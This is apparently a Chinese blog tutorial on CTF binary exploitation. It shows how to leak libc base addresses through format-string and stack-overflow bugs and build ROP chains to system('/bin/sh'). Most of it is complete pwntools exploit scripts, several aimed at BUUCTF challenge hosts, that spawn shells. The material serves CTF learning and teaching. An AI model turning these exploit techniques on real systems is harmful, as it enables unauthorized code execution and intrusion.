• 泄漏libc基地址


    拿libc基地址

    方法一:格式化字符串

    1. 格式化字符串,首先确定输入的 AAAA 在栈上的位置(x)。
    2. 使用 elf.got[fun] 获得got地址。
    3. 利用格式化字符串,构造payload泄漏got地址处的值,recv接受到的字符串中,[4:8]即为fun函数的地址fun_addr。
      • payload = p32(got) + b’%x$s’
      • fun_address = u32(p.recvuntil(b’\xf7’)[4:8])
    4. 利用 LibcSearcher 选择libc的版本。
    5. 最后计算libc的基地址: libcbase = fun_addr - libc.dump(“fun”)
    6. 最后根据基地址libcbase即可计算system函数的绝对地址:
      • sys_addr = libcbase + libc.dump(“system”)
      • sh_addr = libcbase + libc.dump(“str_bin_sh”)
    7. 最后根据获得到的地址即可构造ROP链。
    实例:
    from pwn import *
    from LibcSearcher import *
    p=process("./test3")
    elf=p.elf
    
    fun_name="read"
    
    #get the fun'got_address
    fun_got=elf.got[fun_name]  #0x804c004
    fun_plt=elf.plt[fun_name]  #0x8049040
    print(hex(fun_got),hex(fun_plt))
    
    p.recvuntil(b"hello\n")
    
    #yichu
    payload = p32(0x804c004) + b'%10$s'
    p.sendline(payload)
    
    
    fun_address = u32(p.recvuntil(b'\xf7')[4:8])
    print("fun_address:",hex(fun_address))
    
    #base_address
    libc = LibcSearcher(fun_name,fun_address)
    libc_base = fun_address - libc.dump(fun_name)
    print("libc_base :",hex(libc_base))
    
    #get system address and shell address
    sys_address = libc_base + libc.dump('system')
    sh_address  = libc_base + libc.dump('str_bin_sh')
    print("system address:",hex(sys_address))
    print("bin_sh address:",hex(sh_address))
    

    方法二:栈溢出

    image-20240529174702310

    1. 利用 puts函数 ,泄漏一个函数的got地址,然后输出got地址处的数据,即为该函数的真实地址。
    2. 首先确定栈溢出的位置:ida中查看栈的位置,确定好溢出的偏移。

    image-20240529175118360

    1. 使用 ELF.got[fun_name],ELF.plt[‘puts’] ,泄漏 fun_name的got地址和 puts函数的plt地址

    2. 利用栈溢出、got地址、puts函数的plt地址来输出got地址处的值,即fun_name函数的地址:

      • 64位下puts参数传递:利用 rdi寄存器 传递参数,使用指令 **ROPgadget --binary xxx --only ‘pop|ret’ ** 拿到ret_addr用来给rdi传参。
      • 构造 payload = b’a’*(offset)+p64(ret_addr)+p64(got)+p64(puts_plt)+p64(ret)
      • 其中 got 是给调用puts函数是传递的参数,puts_plt是用来调用puts函数,最后ret是执行完puts函数后返回的地址可斟酌选择。(一般用 puts函数 输出 puts函数的地址
      • sendline完成,recv接受fun_name函数的地址: addr=u64(p.recv(6).ljust(0x8,b’\x00’)),其中recv(6)表示只接受6字节的数据, ljust 将接受到的数据 左对齐 ,并且 长度位8个字节 (保证u64转化位无符号整数时满64bit即8字节,否则会报错),不足的用00补充。
      • 然后同样使用 libc = LibcSearcher(‘puts’,addr),libcbase = addr - libc.dump(‘puts’) 选择libc版本计算libc的基地址libcbase。
      • 最后计算 system函数str_bin_sh 的地址:
        • sys_addr = libcbase + libc.dump(‘system’),sh_addr = libcbase + libc.dump(‘str_bin_sh’)

      image-20240529180635845

      实例:
      1. 题目:BUUCTF在线评测 (buuoj.cn)

      2. EXP:

        from pwn import *
        from LibcSearcher import *
        
        context(os='linux', arch='amd64', log_level='debug')
        
        p=remote("node5.buuoj.cn",29996)
        
        elf = ELF('./ciscn_2019_c_1')
        ret_address = 0x400c83
        
        got = elf.got['puts']		#0x602020
        plt = elf.plt['puts']
        #print(hex(got))
        main_address = 0x400B28
        p.recv()
        p.sendline(b'1')
        p.recvuntil(b"encrypted\n")
        
        payload = (b'a'*(0x50+8))+p64(ret_address)+p64(got)+p64(plt)+p64(main_address)
        p.sendline(payload)
        p.recvuntil(b'Ciphertext\n')
        p.recvuntil(b'\n')
        addr=u64(p.recv(6).ljust(0x8,b'\x00'))
        print(hex(addr))
        libc = LibcSearcher('puts',addr)
        libcbase = addr - libc.dump('puts')
        print(hex(libcbase))
        sys_addr = libcbase + libc.dump('system')
        sh_addr = libcbase + libc.dump('str_bin_sh')
        
        p.recv()
        p.sendline(b'1')
        p.recvuntil(b"encrypted\n")
        payload = b'a'*0x58+p64(ret_address)+p64(sh_addr)+p64(0x4006B9)+p64(sys_addr)
        p.sendline(payload)
        p.interactive()
        
        

    方法3:

    1. write函数溢出(题目里面给出libc的版本)
    1. 利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。

    2. 先看汇编下调用write函数时参数的传递:(以32位为例)长度+地址+1 构造栈时反过来 1+地址+长度

      image-20240530091712374

    3. 溢出EXP:

      #启动题目所给的so文件,so文件需要在同一目录下
      libc=ELF('libc-2.23.so')
      got = elf.got['write']
      plt = elf.plt['write']
      main_addr = 0x08048825
      
      #构造payload,利用write函数输出write函数的实际地址
      payload = b'a'*(0xe7+4)+p32(plt)+p32(main_addr)+p32(1)+p32(got)+p32(4)
      p.sendline(payload)
      #接受返回的地址
      addr = u32(p.recv(4).ljust(4,b'\x00'))
      print(hex(addr))
      
    4. 利用返回的地址计算liba_base,sys_addr,bin_addr地址:

      #计算基地址libabase
      libcbase = addr - libc.sym['write']
      #拿到sys_addr和bin_addr
      sys_addr = libcbase + libc.sym['system']
      str_sh   = libcbase + next(libc.search('/bin/sh'))
      print(hex(sys_addr),hex(str_sh))
      
      #最后利用计算的函数地址和'bin/sh'地址,栈溢出构造ROP
      payload = b'a'*(0xe7+4)+p32(sys_addr)+p32(0)+p32(str_sh)
      p.sendline(payload)
      p.interactive()
      
    2. write函数溢出(题目没给给出libc的版本)
    1. 题目地址:BUUCTF在线评测 (buuoj.cn)

    2. 题目没有提供后门函数,但是给了栈溢出和write函数调用:

      image-20240601105706072

      image-20240601104919755

    3. 这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面 没有调用过write函数 ,也可以 直接利用栈溢出 泄漏,因为在栈溢出时,程序会先解析write函数的地址将其填入got表项中:

      from pwn import *
      from LibcSearcher import *
      
      context(os='linux', arch='i386', log_level='debug')
      
      p=remote("node5.buuoj.cn",28334)
      elf=ELF('./2018_rop')
      got = elf.got['write']
      plt = elf.plt['write']
      print(hex(got),hex(plt))
      main_addr = 0x080484C6
      
      #这里程序会跳转到write函数的plt表,由于先前没有调用过write函数,所以此时write函数的got表还未填充地址,要调用write函数,程序会先解析write函数的地址(此时wrie函数的got表会更新),也就能泄漏write函数的地址了。
      payload = b'a'*(0x88+4)+p32(plt)+p32(main_addr)+p32(1)+p32(got)+p32(4)
      p.sendline(payload)
      addr = u32(p.recv())
      print(hex((addr)))
      
      libc = LibcSearcher('write',addr)
      liba_base = addr - libc.dump('write')
      sys_addr = liba_base + libc.dump('system')
      sh_addr  = liba_base + libc.dump('str_bin_sh')
      print(hex(liba_base),hex(sys_addr),hex(sh_addr))
      
      
      payload = b'a'*(0x88+4)+p32(sys_addr)+p32(0)+p32(sh_addr)
      p.sendline(payload)
      
      p.sendline(b'cat flag')
      p.interactive()
      
      

      image-20240601110334585

  • 相关阅读:
    3D全景:为各行业提供更真实的交互体验
    python每日一题【剑指 Offer 10- II. 青蛙跳台阶问题】
    3、bash的指令顺序、欢迎信息、初始化加载的文件等
    2008-2020年数据上市公司高管团队异质性数据包含Stata代码
    Selenium——利用input标签上传文件
    自然语言处理从零到入门 Attention 机制
    【案例教学】华为云API对话机器人的魅力—体验AI垃圾分类机器人
    Avalonia常用小控件Menu
    PDF如何转Word?分享几个实用办公软件给你
    阿里云认证是什么?报考要什么条件?
  • 原文地址:https://blog.csdn.net/yjh_fnu_ltn/article/details/139380709